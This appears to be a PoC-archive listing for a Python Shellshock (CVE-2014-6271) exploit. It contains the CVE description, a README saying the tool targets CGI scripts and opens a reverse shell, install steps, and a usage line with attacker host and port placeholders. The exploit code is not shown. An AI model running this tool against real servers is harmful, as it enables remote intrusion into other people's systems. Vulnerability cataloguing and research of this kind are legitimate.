Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
CVE-2014-6271(RCE) poc Exploit
Readme
# 🚨 Shellshock RCE Exploit (CVE-2014-6271) 
 This is a Python exploit for the [Shellshock vulnerability (CVE-2014-6271)](https://nvd.nist.gov/vuln/detail/CVE-2014-6271), which affects **GNU Bash**. The exploit targets **CGI scripts** on vulnerable web servers and establishes a **reverse shell** to the attacker's machine.

---

##  CVE ID
> **CVE-2014-6271**

---
##  Disclaimer

This tool is intended **only for educational and ethical purposes**. 

---
##  Features

- Exploits vulnerable CGI scripts using Shellshock
- Reverse shell handler 
- Supports:
  - HTTP & HTTPS
  - Custom CGI paths
  - proxy support
- Interactive shell on success



## CVE Information

- **CVE**: [CVE-2014-6271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
- **Vulnerability**: GNU Bash environment variable command injection
- **Impact**: Remote Code Execution (RCE)  crafted headers to CGI applications

##  Requirements

- Python 3.x
- [`pwntools`](https://docs.pwntools.com/)
- [`requests`](https://docs.python-requests.org/)

## Install
```
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
```


---

## Example Usage 

```bash
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg
File Snapshot

[4.0K] /data/pocs/4f9792e45438a12406fe60ce7d10fd3d90c00627 ├── [3.3K] CVE-2014-6271.py ├── [1.0K] LICENSE └── [1.4K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →